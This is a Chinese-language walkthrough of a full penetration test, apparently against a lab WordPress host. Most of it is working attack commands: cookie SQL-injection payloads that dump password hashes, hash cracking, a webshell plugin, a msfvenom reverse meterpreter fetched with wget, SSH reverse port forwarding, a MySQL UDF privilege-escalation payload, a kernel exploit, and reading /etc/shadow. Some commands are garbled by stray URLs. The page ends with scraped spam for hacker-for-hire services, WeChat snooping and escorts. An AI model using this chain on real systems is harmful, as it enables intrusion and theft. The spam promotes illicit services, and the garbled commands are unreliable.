sudo nmap -sS -sC -p0-65535 target.com
-sS:tcp SYN方式扫描,是tcp半开式的扫描,速度较快
-sC:等价于--script=default,使用默认的脚本进行扫描
-p0-65535:指定全端口扫描
在对靶机的扫描中,发现只开放22和80端口,80端口是一个wordpress网站,进行下一步
目录扫描:
WordPress 漏洞扫描:
漏洞搜索:
wpscan扫描出ocean等组件,然后用searchsploit发现有sql注入等多个漏洞,进行下一步测试
通过searchsploit搜索到此处cookie中存在注入点
成功得到回显后,继续注入
["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
#查找表名
["1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,table_name,11FROM information_s
chema.tables#"]
#查看有哪些字段
["1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,column_name,11FROM information_
schema.columns WHERE table_name='wp_users'#"]
#查看字段内容
["1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_login,11FROM wp_users#"
["1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_pass,11FROM wp_users#"]
拿到密码hash之后,可以使用kali的john工具和rockyou密码本尝试破解
john--wordlist=/usr/share/wordlists/rockyou.txt pass.txt
成功登录后台管理页面
后台在管理页面上传插件处,上传一个webshell
#安装seclists,用里面的插件来getshell
sudo apt install seclists
cd /seclists/Web-Shells/WordPress
#上传plugin-shell.zip,安装插件并测试
curl http://xx.xx/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami
通过msf生成一个shell,传到宿主机
#生成shell
msfvenom-p linux/x86/meterpreter/reverse_tcp LHOST=xx LPORT=443 -
f elf > shell.elf
#本地搭建http服务器
python3-m http.server 80
#宿主机远程下载shell
curl http://xx.xx/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=wget%20http://x.x.x.x/shell.elf
#shell文件加执行权限
curl http://xx.xx/wp-content/plugins/plugin-shell/plugin-shell.ph
p?cmd=chmod%20%2bx%20shell.elf
#本地开启监听
sudo msfconsole-q-x "use exploit/multi/handler;\
> ? ? ? ? ? ? set PAYLOAD linux/x86/meterpreter/reverse_tcp;\
> ? ? ? ? ? ? set LHOST x.x.x.x;\
> ? ? ? ? ? ? set LPORT 443;\
> ? ? ? ? ? ? run"
#触发
curl http://xx.xx/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=https://www.freebuf.com/articles/network/shell.elf
使用msf来枚举信息
#进入msf的交互shell
shell
#枚举基本信息
ifonfig
hostname
cat /etc/issue
cat /proc/version
#查找数据库配置信息
pwd
#查看wp-config.php文件,找到数据库相关信息,包括数据库ip和密码
cat wp-config.php
端口转发到本地
#在msf里面上传nmap或编写脚本,在宿主机上进行端口扫描
upload /home/kali/portscan.sh /tmp/portscan.sh
chmod +x portscan.sh
#脚本内容如下
#!/bin/bash
host=x.x.x.x
for portin {1..65535}; do
timeout .1 bash-c "echo >/dev/tcp/$host/$port" &&
echo "port $port is open"
done
echo "Done"
#扫描得到宿主机开放3306和22端口,宿主机a.a.a.a公钥放在本地kali(x.x.x.x)
#进行端口22转发到本地kali的1122,3306转发到本地的13306
ssh-keygen
ssh -f -N -R 1122:a.a.a.a:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null"-o "StrictHostKeyChecking=no"-i /tmp/keys/id_rsa kali@x.x.x.x
数据库探测
#登录数据库
mysql --host=127.0.0.1 --port=13306 --user=wp -p
show grants
#查看权限情况
show grants
#查看数据库中的变量,寻找是否有敏感信息
show variables
#寻找数据库相关漏洞
searchsploit mysql
尝试udf提权
udf(Userdefined function)是用户自定义函数,可以通过写入自定义函数的方式提权
1.把含义自定义函数(如执行系统命令函数“sys_eval”)的dll文件放入特定文件夹下。
2.声明引入这个dll文件中的自定义函数。
3.使用自定义的函数。
#udf提权基本操作
select @@plugin_dir
select binary 0xshellcode into dumpfile @@plugin_dir;
create function sys_exec returns int soname udf_filename;
select * from mysql.func where name='sys_exec'\G
#使用udf提权exp
git clone https://github.com/mysqludf/lib_mysqludf_sys.git
make
gcc -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/ -I/usr/include/mariadb
/server/private -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
#转换为16进制内容
xxd -p lib_mysqludf_sys.so | tr -d ' ' > lib_mysqludf_s
ys.so.hex
?
set @shell=0x7f454c4602010100000000000000000003003e000100000000110000000000004000000000000000e03b0000000000000000000040003800090040001c001b0001000000040
00000000000...00000000000000000000;
#检查变量定义是否成功
select @@plugin_dir
#执行导出文件夹,失败,提示无权限,没有dumpfile的权限
select binary @shell into dumpfile '/home/dev/plugin/udf_sys_exec.so
使用searchsploit 模块寻找ubantu16.4相关的提权模块
searchsploit ubuntu 16.04
#找到一个合适的exp,进行编译
gcc 45010.c -o 45010
#在msf下传提权脚本到宿主机
upload /home/kali/45010 /tmp/
#执行
chmod +x 45010 && https://www.freebuf.com/articles/network/45010
#提权成功
寻找数据库登录凭据信息
#查看登录的用户信息
cat /etc/passwd && cat /etc/group && cat /etc/shadow
#查看登录用户的home目录
ll /home/xx
#查看目录下的.bash_history文件
#查看~/.bash_history文件,发现数据库root密码
数据库权限提升
#使用前面的 ***
set @shell=0x7f454c4602010100000000000000000003003e000100000000110
000000000004000000000000000e03b0000000000000000000040003800090040001c001b0001000000040
00000000000...00000000000000000000;
select @@plugin_dir;
select binary @shell into dumpfile '/home/dev/plugin/udf_sys_exec.so
create function sys_exec returns int soname 'udf_sys_exec.so';
select * from mysql.func where name='sys_exec';
#本机搭建http服务传文件
python3 -m http.server 80
#宿主机下载shell
select sys_exec('wget http://10.11.0.4/shell.elf');
select sys_exec('chmod +x https://www.freebuf.com/articles/network/shell.elf');
#监听并获得一个mysql用户的shell
whoami
-mysql
此时,我们已经有了root及mysql的权限,可以和一台宿主机交换公钥建立稳定的ssh,继续进行内网渗透
黑客需要掌握哪些(黑客要掌握的技术)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客业...
外地查男友微信聊天纪录(如何查微信聊天頻率最高者) 大家都了解,大家都了解,每一个人都担心情丝折磨自己,但这些情丝的情感早就沉积在大家的内心,摧残着大家。我协助大家解决这类情丝,只需心存一点低沉,平...
跟着人们糊口节拍的不绝增加,但是苦了一些个上班族,平时忙的连饭就要搪塞几口,所以,快餐逐步的就成为了上班族的等职业人更多去选择的美食,说起汉堡,相信各人都不会生疏,作为当下很是受上班族以及学生党喜欢的...
好似每台电脑上都是有自身的IP一样,每台iPhone也是有自身的ID,每一个ID号都是有与之相匹配的登陆密码,到哪倘若一不小心把忘记密码应该怎么办呢?iPhone的id账号忘记了又怎么办呢,因此搜集了...
费城计票中心附近遭炸弹威胁 警方紧急疏散人群 据《国会山》6日报道,美国费城警方在接到炸弹威胁警告后,当日疏散了该市的一座购物中心。警方向《国会山》确认了这一信息,并立即采取排查行动,但并未...
内容 评分:私拍群,服务项目:喷泉,客户打分:9.3分,伴游类型:高档酒店,伴游活动:漫展,伴游时间:节假日休息,预约方式:经纪人微信找伴游,预约次数:52次,陪玩地点:虹口区,见面地点:市区, 生活...